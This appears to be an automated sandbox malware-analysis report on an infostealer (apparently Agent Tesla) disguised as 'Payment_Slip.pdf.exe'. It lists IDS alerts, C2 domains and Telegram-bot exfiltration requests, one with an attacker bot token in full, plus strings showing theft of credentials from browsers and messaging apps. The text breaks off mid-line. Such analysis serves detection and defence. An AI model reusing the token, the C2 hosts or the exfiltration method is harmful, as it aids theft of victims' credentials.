Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49757 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49761 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49749 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49733 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49743 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49743 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49735 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49754 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49733 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49733 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49762 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49755 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49764 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49762 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49762 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49757 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49771 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49744 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49767 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49749 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49761 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49759 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49765 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49754 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49769 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49767 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49765 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49759 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2851779 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil : 192.168.2.4:49753 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49753 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49769 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:49763 -> 149.154.167.220:443
Source: Network traffic Suricata IDS: 2852815 - Severity 1 - ETPRO MALWARE Agent Tesla Telegram Exfil M2 : 192.168.2.4:49763 -> 149.154.167.220:443
Source: Malware configuration extractor URLs: ratianaana701.bounceme.net
Source: Malware configuration extractor URLs: milala.duckdns.org
Source: unknown DNS query: name: api.telegram.org
Source: global traffic TCP traffic: 192.168.2.4:49720 -> 103.186.117.228:9373
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 66.102.1.109:587
Source: global traffic TCP traffic: 192.168.2.4:49766 -> 74.125.71.108:587
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd63c7c30640d9 Host: api.telegram.org Content-Length: 968 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd63d5b8d96e57 Host: api.telegram.org Content-Length: 7553 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd63c7d00704e1 Host: api.telegram.org Content-Length: 968 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd63d890031cde Host: api.telegram.org Content-Length: 7553 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd63c7d9acfd77 Host: api.telegram.org Content-Length: 7553 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd6fe1c3fdf431 Host: api.telegram.org Content-Length: 930 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd6fe75b7b2864 Host: api.telegram.org Content-Length: 67009 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd750e94b613a4 Host: api.telegram.org Content-Length: 67009 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd701f240ba35c Host: api.telegram.org Content-Length: 67009 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd79f459671188 Host: api.telegram.org Content-Length: 67009 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd83b7ecb4b731 Host: api.telegram.org Content-Length: 71981 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd842d776ffeba Host: api.telegram.org Content-Length: 1083 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd8431aa5955fd Host: api.telegram.org Content-Length: 67150 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd8a92e30665c3 Host: api.telegram.org Content-Length: 67013 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd9f0bac1b425a Host: api.telegram.org Content-Length: 67013 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd63ba5cba4639 Host: api.telegram.org Content-Length: 67009 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd63ba5cbf0ac5 Host: api.telegram.org Content-Length: 67009 Expect: 100-continue
Source: global traffic HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd63ba5ce792d8 Host: api.telegram.org Content-Length: 67009 Expect: 100-continue Connection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Joe Sandbox View IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View IP Address: 104.26.12.205 104.26.12.205
Source: Joe Sandbox View ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown DNS query: name: api.ipify.org
Source: unknown DNS query: name: api.ipify.org
Source: Network traffic Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.4:49726 -> 178.237.33.50:80
Source: global traffic TCP traffic: 192.168.2.4:49731 -> 66.102.1.109:587
Source: global traffic TCP traffic: 192.168.2.4:49766 -> 74.125.71.108:587
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Users\user\AppData\Roaming\mHTmhPhJy.exe Code function: 11_2_0041936B InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 11_2_0041936B
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: Software\America Online\AOL Instant Messenger (TM)\CurrentVersion\Users%s\Loginprpl-msnprpl-yahooprpl-jabberprpl-novellprpl-oscarprpl-ggprpl-ircaccounts.xmlaimaim_1icqicq_1jabberjabber_1msnmsn_1yahoogggg_1http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com equals www.ebuddy.com (eBuggy)
Source: Payment_Slip.pdf.exe, Payment_Slip.pdf.exe, 00000010.00000002.1225391140.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
Source: Payment_Slip.pdf.exe String found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242674195.000000000155D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imgres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.facebook.com (Facebook)
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1242674195.000000000155D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: s://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live.com/oauth20_desktop.srfhttps://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com::MBI_SSL&response_type=token&display=windesktop&theme=win7&lc=2057&redirect_uri=https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srf?lc=1033https://login.live.com/oauth20_desktop.srffile:///C:/Windows/system32/oobe/FirstLogonAnim.htmlfile://192.168.2.1/all/install/setup.au3file://192.168.2.1/all/ProfessionalRetail.imgfile://192.168.2.1/all/Professional2019Retail.imgres://C:\Windows\system32\mmcndmgr.dll/views.htmhttps://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login equals www.yahoo.com (Yahoo)
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.facebook.com (Facebook)
Source: Payment_Slip.pdf.exe, 0000000E.00000002.1241566515.0000000000400000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: ratianaana701.bounceme.net
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: global traffic DNS traffic detected: DNS query: api.ipify.org
Source: global traffic DNS traffic detected: DNS query: smtp.gmail.com
Source: global traffic DNS traffic detected: DNS query: api.telegram.org
Source: unknown HTTP traffic detected: POST /bot5612460560:AAHyXkizBwpknHBFsEt3GDIwhLylabAVwjM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8dd63c7c30640d9Host: api.telegram.orgContent-Length: 968Expect: 100-continueConnection: Keep-Alive
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003002000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003232000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: host.exe, 0000000C.00000002.3622366959.0000000002742000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000026F8000.00000004.00000800.00020000.00000000.sdmp, host.exe, 0000000C.00000002.3622366959.00000000027BE000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002578000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002693000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000025E6000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.000000000283C000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.0000000002707000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 00000019.00000002.3621446588.00000000027CC000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003050000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.000000000307B000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000003146000.00000004.00000800.00020000.00000000.sdmp, mykksg.exe, 0000001B.00000002.3620392043.0000000002F95000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://api.telegram.org
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067BC000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/r/r1.crl0
Source: conserver.exe, 0000000D.00000002.3619471195.0000000003242000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.00000000031A3000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.000000000327A000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.00000000033CD000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.000000000614D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002BA9000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C14000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002C5E000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://c.pki.goog/wr2/oBFYYahzgVI.crl0
Source: bhv8E9.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: bhv8E9.tmp.14.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0B
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007300000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3642218318.0000000006720000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.00000000060D0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3654699168.0000000006CA0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.pki.goog/gsr1/gsr1.crl0;
Source: svchost.exe, 0000000A.00000002.2826707788.000001F041607000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.ver)
Source: bhv8E9.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0
Source: bhv8E9.tmp.14.dr String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: bhv8E9.tmp.14.dr String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: Windows Update.exe, 0000001A.00000002.3620793390.0000000002A12000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://eBhMtB.com
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041468000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
Source: edb.log.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
Source: qmgr.db.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
Source: qmgr.db.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041468000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
Source: svchost.exe, 0000000A.00000003.1203278984.000001F041468000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
Source: svchost.exe, 0000000A.00000003.1203278984.000001F04149D000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr String found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
Source: qmgr.db.10.dr String found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
Source: Payment_Slip.pdf.exe, 00000005.00000002.3611370738.0000000001392000.00000004.00000020.00020000.00000000.sdmp, mHTmhPhJy.exe, dwn.exe String found in binary or memory: http://geoplugin.net/json.gp
Source: Payment_Slip.pdf.exe, 00000000.00000002.1187261780.000000000340E000.00000004.00000800.00020000.00000000.sdmp, mHTmhPhJy.exe, 00000007.00000002.1251111243.000000000416F000.00000004.00000800.00020000.00000000.sdmp, mHTmhPhJy.exe, 0000000B.00000002.1203872894.0000000000400000.00000040.00000400.00020000.00000000.sdmp, dwn.exe, 00000011.00000000.1223302187.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, dwn.exe, 00000011.00000002.1224421328.0000000000456000.00000002.00000001.01000000.0000000F.sdmp, dwn.exe.5.dr String found in binary or memory: http://geoplugin.net/json.gp/C
Source: conserver.exe, 0000000D.00000002.3642218318.000000000672C000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067E4000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3656699383.0000000007307000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3613427802.000000000148B000.00000004.00000020.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3619471195.0000000003156000.00000004.00000800.00020000.00000000.sdmp, conserver.exe, 0000000D.00000002.3643963659.00000000067BC000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549573175.00000000073A0000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1539307669.0000000003388000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1543370328.000000000633D000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 00000018.00000002.1549475670.0000000007390000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3643631225.0000000006122000.00000004.00000020.00020000.00000000.sdmp, Windows Update.exe, 0000001A.00000002.3620793390.0000000002B62000.00000004.00000800.00020000.00000000.sdmp, Windows Update.exe, 